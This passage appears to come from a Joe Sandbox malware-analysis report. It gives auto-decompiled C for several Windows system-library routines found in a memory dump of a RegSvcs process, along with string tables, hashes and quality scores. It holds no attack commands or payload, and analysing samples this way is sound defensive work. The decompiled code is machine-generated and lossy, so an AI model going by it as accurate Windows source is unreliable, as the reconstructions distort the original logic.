                                          																				_t177 = E0132FD22(_t177);
                                          																				__eflags = _t177;
                                          																				if(_t177 == 0) {
                                          																					L42:
                                          																					_t77 = 0xc0000001;
                                          																					goto L33;
                                          																				} else {
                                          																					_t130 = E0132FD9B(_t177, 0, 4);
                                          																					__eflags = _t130;
                                          																					if(_t130 != 0) {
                                          																						goto L42;
                                          																					} else {
                                          																						 *(_t177 + 0x20) =  *(_t177 + 0x20) & 0xffffffbf;
                                          																						_t91 =  *(_t177 + 0x20);
                                          																						goto L26;
                                          																					}
                                          																				}
                                          																				goto L35;
                                          																			} else {
                                          																				L26:
                                          																				_t94 = _t91 & 0xfffffffb | 0x00000002;
                                          																				__eflags = _t94;
                                          																				L27:
                                          																				 *(_t177 + 0x20) = _t94;
                                          																				__eflags = _t170 & 0x00008000;
                                          																				if((_t170 & 0x00008000) != 0) {
                                          																					_t95 = _a12;
                                          																					__eflags = _t95;
                                          																					if(_t95 != 0) {
                                          																						_t96 =  *_t95;
                                          																						__eflags = _t96;
                                          																						if(_t96 != 0) {
                                          																							 *((short*)(_t177 + 0x22)) = 0;
                                          																							_t40 = _t177 + 0x20;
                                          																							 *_t40 =  *(_t177 + 0x20) | _t96 << 0x00000010;
                                          																							__eflags =  *_t40;
                                          																						}
                                          																					}
                                          																				}
                                          																				goto L31;
                                          																			}
                                          																		}
                                          																	}
                                          																}
                                          															}
                                          														}
                                          													} else {
                                          														_t147 =  *( *[fs:0x18] + 0xfc0);
                                          														_t106 =  *(_t147 + 0x20);
                                          														__eflags = _t106 & 0x00000040;
                                          														if((_t106 & 0x00000040) != 0) {
                                          															_t147 = E0132FD22(_t147);
                                          															__eflags = _t147;
                                          															if(_t147 == 0) {
                                          																L41:
                                          																_t130 = 0xc0000001;
                                          																L32:
                                          																_t77 = _t130;
                                          																goto L33;
                                          															} else {
                                          																 *(_t147 + 0x20) =  *(_t147 + 0x20) & 0xffffffbf;
                                          																_t106 =  *(_t147 + 0x20);
                                          																goto L17;
                                          															}
                                          															goto L35;
                                          														} else {
                                          															L17:
                                          															_t108 = _t106 | 0x00000080;
                                          															__eflags = _t108;
                                          															 *(_t147 + 0x20) = _t108;
                                          															 *( *[fs:0x18] + 0xfc0) = _t147;
                                          															goto L18;
                                          														}
                                          													}
                                          												}
                                          											}
                                          											L33:
                                          										}
                                          									}
                                          								}
                                          							}
                                          						}
                                          						L35:
                                          						return _t77;
                                          					} else {
                                          						 *_t75 = 0x13e7b80;
                                          						 *((intOrPtr*)(_t75 + 4)) = _t134;
                                          						 *_t134 = _t75;
                                          						 *0x13e7b84 = _t75;
                                          						_t73 = E0130EB70(_t134, 0x13e7b60);
                                          						if( *0x13e7b20 != 0) {
                                          							_t73 =  *( *[fs:0x30] + 0xc);
                                          							if( *((char*)(_t73 + 0x28)) == 0) {
                                          								_t73 = E0130FF60( *0x13e7b20);
                                          							}
                                          						}
                                          						goto L5;
                                          					}
                                          				}
                                          			}

                                          Strings
                                          • H", xrefs: 0132FAF1
                                          • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 0136BE0F
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!$H"
                                          • API String ID: 0-3659178260
                                          • Opcode ID: 3060b010a75b01e33b57f191409aa64ea047561720eca38ad510df26a8866a71
                                          • Instruction ID: ac13d5d23e32a23f7a0f6cd95745b09a1c3a00f5e88586ef4ae1a0d586527050
                                          • Opcode Fuzzy Hash: 3060b010a75b01e33b57f191409aa64ea047561720eca38ad510df26a8866a71
                                          • Instruction Fuzzy Hash: A7A10571B006268BEB26EF6CC850B7AB7BCAF44718F044569EA46DB795DB30D841CB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 60%
                                          			E013BE539(unsigned int* __ecx, intOrPtr __edx, signed int _a4, signed int _a8) {
                                          				signed int _v20;
                                          				char _v24;
                                          				signed int _v40;
                                          				char _v44;
                                          				intOrPtr _v48;
                                          				signed int _v52;
                                          				unsigned int _v56;
                                          				char _v60;
                                          				signed int _v64;
                                          				char _v68;
                                          				signed int _v72;
                                          				void* __ebx;
                                          				void* __edi;
                                          				char _t87;
                                          				signed int _t90;
                                          				signed int _t94;
                                          				signed int _t100;
                                          				intOrPtr* _t113;
                                          				signed int _t122;
                                          				void* _t132;
                                          				void* _t135;
                                          				signed int _t139;
                                          				signed int* _t141;
                                          				signed int _t146;
                                          				signed int _t147;
                                          				void* _t153;
                                          				signed int _t155;
                                          				signed int _t159;
                                          				char _t166;
                                          				void* _t172;
                                          				void* _t176;
                                          				signed int _t177;
                                          				intOrPtr* _t179;
                                          
                                          				_t179 = __ecx;
                                          				_v48 = __edx;
                                          				_v68 = 0;
                                          				_v72 = 0;
                                          				_push(__ecx[1]);
                                          				_push( *__ecx);
                                          				_push(0);
                                          				_t153 = 0x14;
                                          				_t135 = _t153;
                                          				_t132 = E013BBBBB(_t135, _t153);
                                          				if(_t132 == 0) {
                                          					_t166 = _v68;
                                          					goto L43;
                                          				} else {
                                          					_t155 = 0;
                                          					_v52 = 0;
                                          					asm("stosd");
                                          					asm("stosd");
                                          					asm("stosd");
                                          					asm("stosd");
                                          					asm("stosd");
                                          					_v56 = __ecx[1];
                                          					if( *__ecx >> 8 < 2) {
                                          						_t155 = 1;
                                          						_v52 = 1;
                                          					}
                                          					_t139 = _a4;
                                          					_t87 = (_t155 << 0xc) + _t139;
                                          					_v60 = _t87;
                                          					if(_t87 < _t139) {
                                          						L11:
                                          						_t166 = _v68;
                                          						L12:
                                          						if(_t132 != 0) {
                                          							E013BBCD2(_t132,  *_t179,  *((intOrPtr*)(_t179 + 4)));
                                          						}
                                          						L43:
                                          						if(_v72 != 0) {
                                          							_push( *((intOrPtr*)(_t179 + 4)));
                                          							_push( *_t179);
                                          							_push(0x8000);
                                          							E013BAFDE( &_v72,  &_v60);
                                          						}
                                          						L46:
                                          						return _t166;
                                          					}
                                          					_t90 =  *(_t179 + 0xc) & 0x40000000;
                                          					asm("sbb edi, edi");
                                          					_t172 = ( ~_t90 & 0x0000003c) + 4;
                                          					if(_t90 != 0) {
                                          						_push(0);
                                          						_push(0x14);
                                          						_push( &_v44);
                                          						_push(3);
                                          						_push(_t179);
                                          						_push(0xffffffff);
                                          						if(E01339730() < 0 || (_v40 & 0x00000060) == 0 || _v44 != _t179) {
                                          							_push(_t139);
                                          							E013BA80D(_t179, 1, _v40, 0);
                                          							_t172 = 4;
                                          						}
                                          					}
                                          					_t141 =  &_v72;
                                          					if(E013BA854(_t141,  &_v60, 0, 0x2000, _t172, _t179,  *_t179,  *((intOrPtr*)(_t179 + 4))) >= 0) {
                                          						_v64 = _a4;
                                          						_t94 =  *(_t179 + 0xc) & 0x40000000;
                                          						asm("sbb edi, edi");
                                          						_t176 = ( ~_t94 & 0x0000003c) + 4;
                                          						if(_t94 != 0) {
                                          							_push(0);
                                          							_push(0x14);
                                          							_push( &_v24);
                                          							_push(3);
                                          							_push(_t179);
                                          							_push(0xffffffff);
                                          							if(E01339730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t179) {
                                          								_push(_t141);
                                          								E013BA80D(_t179, 1, _v20, 0);
                                          								_t176 = 4;
                                          							}
                                          						}
                                          						if(E013BA854( &_v72,  &_v64, 0, 0x1000, _t176, 0,  *_t179,  *((intOrPtr*)(_t179 + 4))) < 0) {
                                          							goto L11;
                                          						} else {
                                          							_t177 = _v64;
                                          							 *((intOrPtr*)(_t132 + 0xc)) = _v72;
                                          							_t100 = _v52 + _v52;
                                          							_t146 =  *(_t132 + 0x10) & 0x00000ffd | _t177 & 0xfffff000 | _t100;
                                          							 *(_t132 + 0x10) = _t146;
                                          							asm("bsf eax, [esp+0x18]");
                                          							_v52 = _t100;
                                          							 *(_t132 + 0x10) = (_t100 << 0x00000002 ^ _t146) & 0x000000fc ^ _t146;
                                          							 *((short*)(_t132 + 0xc)) = _t177 - _v48;
                                          							_t47 =  &_a8;
                                          							 *_t47 = _a8 & 0x00000001;
                                          							if( *_t47 == 0) {
                                          								E01312280(_t179 + 0x30, _t179 + 0x30);
                                          							}
                                          							_t147 =  *(_t179 + 0x34);
                                          							_t159 =  *(_t179 + 0x38) & 1;
                                          							_v68 = 0;
                                          							if(_t147 == 0) {
                                          								L35:
                                          								E0130B090(_t179 + 0x34, _t147, _v68, _t132);
                                          								if(_a8 == 0) {
                                          									E0130FFB0(_t132, _t177, _t179 + 0x30);
                                          								}
                                          								asm("lock xadd [eax], ecx");
                                          								asm("lock xadd [eax], edx");
                                          								_t132 = 0;
                                          								_v72 = _v72 & 0;
                                          								_v68 = _v72;
                                          								if(E01317D50() == 0) {
                                          									_t113 = 0x7ffe0388;
                                          								} else {
                                          									_t177 = _v64;
                                          									_t113 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                          								}
                                          								if( *_t113 == _t132) {
                                          									_t166 = _v68;
                                          									goto L46;
                                          								} else {
                                          									_t166 = _v68;
                                          									E013AFEC0(_t132, _t179, _t166, _t177 + 0x1000);
                                          									goto L12;
                                          								}
                                          							} else {
                                          								L23:
                                          								while(1) {
                                          									if(_v72 < ( *(_t147 + 0xc) & 0xffff0000)) {
                                          										_t122 =  *_t147;
                                          										if(_t159 == 0) {
                                          											L32:
                                          											if(_t122 == 0) {
                                          												L34:
                                          												_v68 = 0;
                                          												goto L35;
                                          											}
                                          											L33:
                                          											_t147 = _t122;
                                          											continue;
                                          										}
                                          										if(_t122 == 0) {
                                          											goto L34;
                                          										}
                                          										_t122 = _t122 ^ _t147;
                                          										goto L32;
                                          									}
                                          									_t122 =  *(_t147 + 4);
                                          									if(_t159 == 0) {
                                          										L27:
                                          										if(_t122 != 0) {
                                          											goto L33;
                                          										}
                                          										L28:
                                          										_v68 = 1;
                                          										goto L35;
                                          									}
                                          									if(_t122 == 0) {
                                          										goto L28;
                                          									}
                                          									_t122 = _t122 ^ _t147;
                                          									goto L27;
                                          								}
                                          							}
                                          						}
                                          					}
                                          					_v72 = _v72 & 0x00000000;
                                          					goto L11;
                                          				}
                                          			}





































                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: `$`
                                          • API String ID: 0-197956300
                                          • Opcode ID: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                                          • Instruction ID: f44dc8cb048768dbe9a7482d2bccf0ac8da496e84d145efc77e5fcbb60d90c53
                                          • Opcode Fuzzy Hash: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                                          • Instruction Fuzzy Hash: E39180312047469FE724CE2DC881B9BBBE5AF84728F14892DF795CBA80E774E904CB51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 77%
                                          			E013751BE(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
                                          				signed short* _t63;
                                          				signed int _t64;
                                          				signed int _t65;
                                          				signed int _t67;
                                          				intOrPtr _t74;
                                          				intOrPtr _t84;
                                          				intOrPtr _t88;
                                          				intOrPtr _t94;
                                          				void* _t100;
                                          				void* _t103;
                                          				intOrPtr _t105;
                                          				signed int _t106;
                                          				short* _t108;
                                          				signed int _t110;
                                          				signed int _t113;
                                          				signed int* _t115;
                                          				signed short* _t117;
                                          				void* _t118;
                                          				void* _t119;
                                          
                                          				_push(0x80);
                                          				_push(0x13d05f0);
                                          				E0134D0E8(__ebx, __edi, __esi);
                                          				 *((intOrPtr*)(_t118 - 0x80)) = __edx;
                                          				_t115 =  *(_t118 + 0xc);
                                          				 *(_t118 - 0x7c) = _t115;
                                          				 *((char*)(_t118 - 0x65)) = 0;
                                          				 *((intOrPtr*)(_t118 - 0x64)) = 0;
                                          				_t113 = 0;
                                          				 *((intOrPtr*)(_t118 - 0x6c)) = 0;
                                          				 *((intOrPtr*)(_t118 - 4)) = 0;
                                          				_t100 = __ecx;
                                          				if(_t100 == 0) {
                                          					 *(_t118 - 0x90) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
                                          					E0130EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                                          					 *((char*)(_t118 - 0x65)) = 1;
                                          					_t63 =  *(_t118 - 0x90);
                                          					_t101 = _t63[2];
                                          					_t64 =  *_t63 & 0x0000ffff;
                                          					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
                                          					L20:
                                          					_t65 = _t64 >> 1;
                                          					L21:
                                          					_t108 =  *((intOrPtr*)(_t118 - 0x80));
                                          					if(_t108 == 0) {
                                          						L27:
                                          						 *_t115 = _t65 + 1;
                                          						_t67 = 0xc0000023;
                                          						L28:
                                          						 *((intOrPtr*)(_t118 - 0x64)) = _t67;
                                          						L29:
                                          						 *((intOrPtr*)(_t118 - 4)) = 0xfffffffe;
                                          						E013753CA(0);
                                          						return E0134D130(0, _t113, _t115);
                                          					}
                                          					if(_t65 >=  *((intOrPtr*)(_t118 + 8))) {
                                          						if(_t108 != 0 &&  *((intOrPtr*)(_t118 + 8)) >= 1) {
                                          							 *_t108 = 0;
                                          						}
                                          						goto L27;
                                          					}
                                          					 *_t115 = _t65;
                                          					_t115 = _t65 + _t65;
                                          					E0133F3E0(_t108, _t101, _t115);
                                          					 *((short*)(_t115 +  *((intOrPtr*)(_t118 - 0x80)))) = 0;
                                          					_t67 = 0;
                                          					goto L28;
                                          				}
                                          				_t103 = _t100 - 1;
                                          				if(_t103 == 0) {
                                          					_t117 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38;
                                          					_t74 = E01313690(1, _t117, 0x12d1810, _t118 - 0x74);
                                          					 *((intOrPtr*)(_t118 - 0x64)) = _t74;
                                          					_t101 = _t117[2];
                                          					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
                                          					if(_t74 < 0) {
                                          						_t64 =  *_t117 & 0x0000ffff;
                                          						_t115 =  *(_t118 - 0x7c);
                                          						goto L20;
                                          					}
                                          					_t65 = (( *(_t118 - 0x74) & 0x0000ffff) >> 1) + 1;
                                          					_t115 =  *(_t118 - 0x7c);
                                          					goto L21;
                                          				}
                                          				if(_t103 == 1) {
                                          					_t105 = 4;
                                          					 *((intOrPtr*)(_t118 - 0x78)) = _t105;
                                          					 *((intOrPtr*)(_t118 - 0x70)) = 0;
                                          					_push(_t118 - 0x70);
                                          					_push(0);
                                          					_push(0);
                                          					_push(_t105);
                                          					_push(_t118 - 0x78);
                                          					_push(0x6b);
                                          					 *((intOrPtr*)(_t118 - 0x64)) = E0133AA90();
                                          					 *((intOrPtr*)(_t118 - 0x64)) = 0;
                                          					_t113 = L01314620(_t105,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8,  *((intOrPtr*)(_t118 - 0x70)));
                                          					 *((intOrPtr*)(_t118 - 0x6c)) = _t113;
                                          					if(_t113 != 0) {
                                          						_push(_t118 - 0x70);
                                          						_push( *((intOrPtr*)(_t118 - 0x70)));
                                          						_push(_t113);
                                          						_push(4);
                                          						_push(_t118 - 0x78);
                                          						_push(0x6b);
                                          						_t84 = E0133AA90();
                                          						 *((intOrPtr*)(_t118 - 0x64)) = _t84;
                                          						if(_t84 < 0) {
                                          							goto L29;
                                          						}
                                          						_t110 = 0;
                                          						_t106 = 0;
                                          						while(1) {
                                          							 *((intOrPtr*)(_t118 - 0x84)) = _t110;
                                          							 *(_t118 - 0x88) = _t106;
                                          							if(_t106 >= ( *(_t113 + 0xa) & 0x0000ffff)) {
                                          								break;
                                          							}
                                          							_t110 = _t110 + ( *(_t106 * 0x2c + _t113 + 0x21) & 0x000000ff);
                                          							_t106 = _t106 + 1;
                                          						}
                                          						_t88 = E0137500E(_t106, _t118 - 0x3c, 0x20, _t118 - 0x8c, 0, 0, L"%u", _t110);
                                          						_t119 = _t119 + 0x1c;
                                          						 *((intOrPtr*)(_t118 - 0x64)) = _t88;
                                          						if(_t88 < 0) {
                                          							goto L29;
                                          						}
                                          						_t101 = _t118 - 0x3c;
                                          						_t65 =  *((intOrPtr*)(_t118 - 0x8c)) - _t118 - 0x3c >> 1;
                                          						goto L21;
                                          					}
                                          					_t67 = 0xc0000017;
                                          					goto L28;
                                          				}
                                          				_push(0);
                                          				_push(0x20);
                                          				_push(_t118 - 0x60);
                                          				_push(0x5a);
                                          				_t94 = E01339860();
                                          				 *((intOrPtr*)(_t118 - 0x64)) = _t94;
                                          				if(_t94 < 0) {
                                          					goto L29;
                                          				}
                                          				if( *((intOrPtr*)(_t118 - 0x50)) == 1) {
                                          					_t101 = L"Legacy";
                                          					_push(6);
                                          				} else {
                                          					_t101 = L"UEFI";
                                          					_push(4);
                                          				}
                                          				_pop(_t65);
                                          				goto L21;
                                          			}






















                                          0x01375222
                                          0x01375222
                                          0x0137522d
                                          0x00000000

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID: Legacy$UEFI
                                          • API String ID: 2994545307-634100481
                                          • Opcode ID: b8e105cec926e3fce1111311e88981da2869f6f2a6c8a2ab526a0c234c4d8e7b
                                          • Instruction ID: 6c50651d287ec8df6f67ec2d92bb424b736214569cf030a7cd2aa210ca7015f6
                                          • Opcode Fuzzy Hash: b8e105cec926e3fce1111311e88981da2869f6f2a6c8a2ab526a0c234c4d8e7b
                                          • Instruction Fuzzy Hash: A4517F71E046099FEB29DFA8C880BADBBF8FF58708F14442DE649EB251DB759901CB10
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 87%
                                          			E0130D5E0(signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16, signed int _a20, signed int _a24) {
                                          				signed int _v8;
                                          				intOrPtr _v20;
                                          				signed int _v36;
                                          				intOrPtr* _v40;
                                          				signed int _v44;
                                          				signed int _v48;
                                          				signed char _v52;
                                          				signed int _v60;
                                          				signed int _v64;
                                          				signed int _v68;
                                          				signed int _v72;
                                          				signed int _v76;
                                          				intOrPtr _v80;
                                          				signed int _v84;
                                          				intOrPtr _v100;
                                          				intOrPtr _v104;
                                          				signed int _v108;
                                          				signed int _v112;
                                          				signed int _v116;
                                          				intOrPtr _v120;
                                          				signed int _v132;
                                          				char _v140;
                                          				char _v144;
                                          				char _v157;
                                          				signed int _v164;
                                          				signed int _v168;
                                          				signed int _v169;
                                          				intOrPtr _v176;
                                          				signed int _v180;
                                          				signed int _v184;
                                          				intOrPtr _v188;
                                          				signed int _v192;
                                          				signed int _v200;
                                          				signed int _v208;
                                          				intOrPtr* _v212;
                                          				char _v216;
                                          				void* __ebx;
                                          				void* __edi;
                                          				void* __esi;
                                          				void* __ebp;
                                          				signed int _t204;
                                          				signed int _t206;
                                          				void* _t208;
                                          				signed int _t211;
                                          				signed int _t216;
                                          				intOrPtr _t217;
                                          				intOrPtr* _t218;
                                          				signed int _t226;
                                          				signed int _t239;
                                          				signed int* _t247;
                                          				signed int _t249;
                                          				void* _t252;
                                          				signed int _t256;
                                          				signed int _t269;
                                          				signed int _t271;
                                          				signed int _t277;
                                          				signed int _t279;
                                          				intOrPtr _t283;
                                          				signed int _t287;
                                          				signed int _t288;
                                          				void* _t289;
                                          				signed char _t290;
                                          				signed int _t292;
                                          				signed int* _t293;
                                          				unsigned int _t297;
                                          				signed int _t306;
                                          				signed int _t307;
                                          				signed int _t308;
                                          				signed int _t309;
                                          				signed int _t310;
                                          				intOrPtr _t311;
                                          				intOrPtr _t312;
                                          				signed int _t319;
                                          				signed int _t320;
                                          				signed int* _t324;
                                          				signed int _t337;
                                          				signed int _t338;
                                          				signed int _t339;
                                          				signed int* _t340;
                                          				void* _t341;
                                          				signed int _t344;
                                          				signed int _t348;
                                          				signed int _t349;
                                          				signed int _t351;
                                          				intOrPtr _t353;
                                          				void* _t354;
                                          				signed int _t356;
                                          				signed int _t358;
                                          				intOrPtr _t359;
                                          				signed int _t361;
                                          				signed int _t363;
                                          				signed short* _t365;
                                          				void* _t367;
                                          				intOrPtr _t369;
                                          				void* _t370;
                                          				signed int _t371;
                                          				signed int _t372;
                                          				void* _t374;
                                          				signed int _t376;
                                          				void* _t384;
                                          				signed int _t387;
                                          
                                          				_v8 =  *0x13ed360 ^ _t376;
                                          				_t2 =  &_a20;
                                          				 *_t2 = _a20 & 0x00000001;
                                          				_t287 = _a4;
                                          				_v200 = _a12;
                                          				_t365 = _a8;
                                          				_v212 = _a16;
                                          				_v180 = _a24;
                                          				_v168 = 0;
                                          				_v157 = 0;
                                          				if( *_t2 != 0) {
                                          					__eflags = E01306600(0x13e52d8);
                                          					if(__eflags == 0) {
                                          						goto L1;
                                          					} else {
                                          						_v188 = 6;
                                          					}
                                          				} else {
                                          					L1:
                                          					_v188 = 9;
                                          				}
                                          				if(_t365 == 0) {
                                          					_v164 = 0;
                                          					goto L5;
                                          				} else {
                                          					_t363 =  *_t365 & 0x0000ffff;
                                          					_t341 = _t363 + 1;
                                          					if((_t365[1] & 0x0000ffff) < _t341) {
                                          						L109:
                                          						__eflags = _t341 - 0x80;
                                          						if(_t341 <= 0x80) {
                                          							_t281 =  &_v140;
                                          							_v164 =  &_v140;
                                          							goto L114;
                                          						} else {
                                          							_t283 =  *0x13e7b9c; // 0x0
                                          							_t281 = L01314620(_t341,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t283 + 0x180000, _t341);
                                          							_v164 = _t281;
                                          							__eflags = _t281;
                                          							if(_t281 != 0) {
                                          								_v157 = 1;
                                          								L114:
                                          								E0133F3E0(_t281, _t365[2], _t363);
                                          								_t200 = _v164;
                                          								 *((char*)(_v164 + _t363)) = 0;
                                          								goto L5;
                                          							} else {
                                          								_t204 = 0xc000009a;
                                          								goto L47;
                                          							}
                                          						}
                                          					} else {
                                          						_t200 = _t365[2];
                                          						_v164 = _t200;
                                          						if( *((char*)(_t200 + _t363)) != 0) {
                                          							goto L109;
                                          						} else {
                                          							while(1) {
                                          								L5:
                                          								_t353 = 0;
                                          								_t342 = 0x1000;
                                          								_v176 = 0;
                                          								if(_t287 == 0) {
                                          									break;
                                          								}
                                          								_t384 = _t287 -  *0x13e7b90; // 0x77d30000
                                          								if(_t384 == 0) {
                                          									_t353 =  *0x13e7b8c; // 0xe93d80
                                          									_v176 = _t353;
                                          									_t320 = ( *(_t353 + 0x50))[8];
                                          									_v184 = _t320;
                                          								} else {
                                          									E01312280(_t200, 0x13e84d8);
                                          									_t277 =  *0x13e85f4; // 0xe91ff0
                                          									_t351 =  *0x13e85f8 & 1;
                                          									while(_t277 != 0) {
                                          										_t337 =  *(_t277 - 0x50);
                                          										if(_t337 > _t287) {
                                          											_t338 = _t337 | 0xffffffff;
                                          										} else {
                                          											asm("sbb ecx, ecx");
                                          											_t338 =  ~_t337;
                                          										}
                                          										_t387 = _t338;
                                          										if(_t387 < 0) {
                                          											_t339 =  *_t277;
                                          											__eflags = _t351;
                                          											if(_t351 != 0) {
                                          												__eflags = _t339;
                                          												if(_t339 == 0) {
                                          													goto L16;
                                          												} else {
                                          													goto L118;
                                          												}
                                          												goto L151;
                                          											} else {
                                          												goto L16;
                                          											}
                                          											goto L17;
                                          										} else {
                                          											if(_t387 <= 0) {
                                          												__eflags = _t277;
                                          												if(_t277 != 0) {
                                          													_t340 =  *(_t277 - 0x18);
                                          													_t24 = _t277 - 0x68; // 0xe91f88
                                          													_t353 = _t24;
                                          													_v176 = _t353;
                                          													__eflags = _t340[3] - 0xffffffff;
                                          													if(_t340[3] != 0xffffffff) {
                                          														_t279 =  *_t340;
                                          														__eflags =  *(_t279 - 0x20) & 0x00000020;
                                          														if(( *(_t279 - 0x20) & 0x00000020) == 0) {
                                          															asm("lock inc dword [edi+0x9c]");
                                          															_t340 =  *(_t353 + 0x50);
                                          														}
                                          													}
                                          													_v184 = _t340[8];
                                          												}
                                          											} else {
                                          												_t339 =  *(_t277 + 4);
                                          												if(_t351 != 0) {
                                          													__eflags = _t339;
                                          													if(_t339 == 0) {
                                          														goto L16;
                                          													} else {
                                          														L118:
                                          														_t277 = _t277 ^ _t339;
                                          														goto L17;
                                          													}
                                          													goto L151;
                                          												} else {
                                          													L16:
                                          													_t277 = _t339;
                                          												}
                                          												goto L17;
                                          											}
                                          										}
                                          										goto L25;
                                          										L17:
                                          									}
                                          									L25:
                                          									E0130FFB0(_t287, _t353, 0x13e84d8);
                                          									_t320 = _v184;
                                          									_t342 = 0x1000;
                                          								}
                                          								if(_t353 == 0) {
                                          									break;
                                          								} else {
                                          									_t366 = 0;
                                          									if(( *( *[fs:0x18] + 0xfca) & _t342) != 0 || _t320 >= _v188) {
                                          										_t288 = _v164;
                                          										if(_t353 != 0) {
                                          											_t342 = _t288;
                                          											_t374 = E0134CC99(_t353, _t288, _v200, 1,  &_v168);
                                          											if(_t374 >= 0) {
                                          												if(_v184 == 7) {
                                          													__eflags = _a20;
                                          													if(__eflags == 0) {
                                          														__eflags =  *( *[fs:0x18] + 0xfca) & 0x00001000;
                                          														if(__eflags != 0) {
                                          															_t271 = E01306600(0x13e52d8);
                                          															__eflags = _t271;
                                          															if(__eflags == 0) {
                                          																_t342 = 0;
                                          																_v169 = _t271;
                                          																_t374 = E01307926( *(_t353 + 0x50), 0,  &_v169);
                                          															}
                                          														}
                                          													}
                                          												}
                                          												if(_t374 < 0) {
                                          													_v168 = 0;
                                          												} else {
                                          													if( *0x13eb239 != 0) {
                                          														_t342 =  *(_t353 + 0x18);
                                          														E0137E974(_v180,  *(_t353 + 0x18), __eflags, _v168, 0,  &_v168);
                                          													}
                                          													if( *0x13e8472 != 0) {
                                          														_v192 = 0;
                                          														_t342 =  *0x7ffe0330;
                                          														_t361 =  *0x13eb218; // 0x0
                                          														asm("ror edi, cl");
                                          														 *0x13eb1e0( &_v192, _t353, _v168, 0, _v180);
                                          														 *(_t361 ^  *0x7ffe0330)();
                                          														_t269 = _v192;
                                          														_t353 = _v176;
                                          														__eflags = _t269;
                                          														if(__eflags != 0) {
                                          															_v168 = _t269;
                                          														}
                                          													}
                                          												}
                                          											}
                                          											if(_t374 == 0xc0000135 || _t374 == 0xc0000142) {
                                          												_t366 = 0xc000007a;
                                          											}
                                          											_t247 =  *(_t353 + 0x50);
                                          											if(_t247[3] == 0xffffffff) {
                                          												L40:
                                          												if(_t366 == 0xc000007a) {
                                          													__eflags = _t288;
                                          													if(_t288 == 0) {
                                          														goto L136;
                                          													} else {
                                          														_t366 = 0xc0000139;
                                          													}
                                          													goto L54;
                                          												}
                                          											} else {
                                          												_t249 =  *_t247;
                                          												if(( *(_t249 - 0x20) & 0x00000020) != 0) {
                                          													goto L40;
                                          												} else {
                                          													_t250 = _t249 | 0xffffffff;
                                          													asm("lock xadd [edi+0x9c], eax");
                                          													if((_t249 | 0xffffffff) == 0) {
                                          														E01312280(_t250, 0x13e84d8);
                                          														_t342 =  *(_t353 + 0x54);
                                          														_t165 = _t353 + 0x54; // 0x54
                                          														_t252 = _t165;
                                          														__eflags =  *(_t342 + 4) - _t252;
                                          														if( *(_t342 + 4) != _t252) {
                                          															L135:
                                          															asm("int 0x29");
                                          															L136:
                                          															_t288 = _v200;
                                          															_t366 = 0xc0000138;
                                          															L54:
                                          															_t342 = _t288;
                                          															L01333898(0, _t288, _t366);
                                          														} else {
                                          															_t324 =  *(_t252 + 4);
                                          															__eflags =  *_t324 - _t252;
                                          															if( *_t324 != _t252) {
                                          																goto L135;
                                          															} else {
                                          																 *_t324 = _t342;
                                          																 *(_t342 + 4) = _t324;
                                          																_t293 =  *(_t353 + 0x50);
                                          																_v180 =  *_t293;
                                          																E0130FFB0(_t293, _t353, 0x13e84d8);
                                          																__eflags =  *((short*)(_t353 + 0x3a));
                                          																if( *((short*)(_t353 + 0x3a)) != 0) {
                                          																	_t342 = 0;
                                          																	__eflags = 0;
                                          																	E013337F5(_t353, 0);
                                          																}
                                          																E01330413(_t353);
                                          																_t256 =  *(_t353 + 0x48);
                                          																__eflags = _t256;
                                          																if(_t256 != 0) {
                                          																	__eflags = _t256 - 0xffffffff;
                                          																	if(_t256 != 0xffffffff) {
                                          																		E01329B10(_t256);
                                          																	}
                                          																}
                                          																__eflags =  *(_t353 + 0x28);
                                          																if( *(_t353 + 0x28) != 0) {
                                          																	_t174 = _t353 + 0x24; // 0x24
                                          																	E013202D6(_t174);
                                          																}
